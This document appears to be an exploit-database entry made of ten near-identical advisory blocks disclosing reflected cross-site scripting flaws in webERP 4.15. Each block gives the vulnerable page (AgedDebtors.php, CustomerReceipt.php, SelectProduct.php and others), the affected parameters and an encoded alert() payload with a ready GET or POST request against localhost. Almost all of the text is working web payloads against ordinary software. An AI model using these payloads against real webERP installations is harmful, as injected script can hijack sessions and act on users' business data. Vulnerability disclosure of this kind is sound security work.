===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004B53)%252b%2522
# GET Request : http://localhost/webERP/webERP/AgedDebtors.php?nsextt=%22%2balert(0x004B53)%2b%22
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x00490C)%252b%2522
# GET Request : http://localhost/webERP/webERP/CustomerAllocations.php?nsextt=%22%2balert(0x00490C)%2b%22
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004F06)%252b%2522
# GET Request : http://localhost/webERP/webERP/CustomerBalancesMovement.php?nsextt=%22%2balert(0x004F06)%2b%22
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : NewReceipt,nsextt,Type,nsparamname
# Attack Pattern : %27%2balert(0x0047E5)%2b%27
# GET Request : http://localhost/webERP/webERP/CustomerReceipt.php?NewReceipt='+alert(0x0047E5)+'&Type=Customer
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x0049AA)%252b%2522
# GET Request : http://localhost/webERP/webERP/CustWhereAlloc.php?nsextt=%22%2balert(0x0049AA)%2b%22
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : FormID,AddToMenu,ScriptName,Title
# Attack Pattern : %27%2balert(0x003279)%2b%27
# POST Request : http://localhost/webERP/webERP/Dashboard.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004C8E)%252b%2522
# GET Request : http://localhost/webERP/webERP/DebtorsAtPeriodEnd.php?nsextt=%22%2balert(0x004C8E)%2b%22
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004BF0)%252b%2522
# GET Request : http://localhost/webERP/webERP/PDFBankingSummary.php?nsextt=%22%2balert(0x004BF0)%2b%22
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt,NewCredit,nsparamname
# Attack Pattern : %27%2balert(0x003279)%2b%27
# GET Request : http://localhost/webERP/webERP/SelectCreditItems.php?NewCredit=Yes&nsextt=%22%2balert(0x0046E2)%2b%22
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt,StockCat,FormID,Keywords,SupplierStockCode,ScriptName,StockCode,AddToMenu,Search,Title
# Attack Pattern : %27%2balert(0x0035E4)%2b%27
# GET Request : http://localhost/webERP/webERP/SelectProduct.php
===========================================================================================